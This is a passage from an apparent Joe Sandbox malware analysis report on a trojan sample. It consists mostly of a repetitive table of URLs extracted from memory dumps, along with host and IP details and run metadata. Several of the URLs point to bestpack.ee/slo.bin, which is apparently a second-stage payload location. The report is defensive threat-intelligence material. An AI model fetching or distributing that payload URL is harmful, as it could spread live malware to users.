      bestpack.ee | 185.86.211.137 | true | false | | unknown
      Name | Malicious | Antivirus Detection | Reputation
      https://bestpack.ee/slo.bin | false | | unknown
      http://bestpack.ee/slo.bin | false | | unknown
00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://bestpack.ee/oISecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://bestpack.ee/slo.binBSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 
00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://bestpack.ee/5SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144571670.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72688325234.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258455659.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372579596.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509198454.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72232647774.00000000066B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916629062.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72574360519.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030912520.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305963490.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 
00000002.00000003.73600667395.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75078811291.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74851095828.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486344040.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419467345.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74623047904.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72346415547.00000000066B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://bestpack.ee/slo.bin7SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://bestpack.ee/aSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144571670.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72688325234.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258455659.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372579596.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509198454.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72232647774.00000000066B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916629062.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72574360519.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030912520.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305963490.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 
00000002.00000003.73600667395.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75078811291.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74851095828.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486344040.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419467345.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74623047904.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72346415547.00000000066B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://bestpack.ee/slo.bin7SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192333805.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737216556.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75078811291.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74965012912.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74851095828.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000001.71909063728.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                  unknown
                                                                  http://bestpack.ee/slo.bin=RSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://bestpack.ee/CISecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://bestpack.ee/slo.bin=RSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://bestpack.ee/SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144571670.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72688325234.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258455659.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 
00000002.00000003.73372579596.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509198454.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72232647774.00000000066B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916629062.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72574360519.00000000066B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://bestpack.ee/slo.bin/SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000001.71909063728.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                              unknown
                                                                              https://bestpack.ee/slo.binhSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://bestpack.ee/slo.bin.RSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://www.quovadis.bm0SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72005247769.00000000066D5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 
00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://bestpack.ee/hISecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://bestpack.ee/slo.binhSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://bestpack.ee/slo.bin$SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
https://ocsp.quovadisoffshore.com0 SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe false
                                                                                            unknown
https://bestpack.ee/slo.bin.R SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmp false
                                                                                              unknown
https://bestpack.ee/slo.binked SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe false
                                                                                                unknown
https://bestpack.ee/slo.bin/ SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmp false
                                                                                                  unknown
http://bestpack.ee/slo.bin& SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp false
                                                                                                    unknown
IP:185.86.211.137
Domain:bestpack.ee
Country:Spain
ASN:50129
ASN Name:TVHORADADAES
Malicious:false
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1520710
                                                                                                    Start date and time:2024-09-27 18:56:02 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 14m 57s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                                                                                    Run name:Suspected Instruction Hammering
                                                                                                    Number of analysed new started processes analysed:3
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal60.troj.evad.winEXE@3/9@1/1
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 50%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 83%
                                                                                                    • Number of executed functions: 53
                                                                                                    • Number of non-executed functions: 31
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
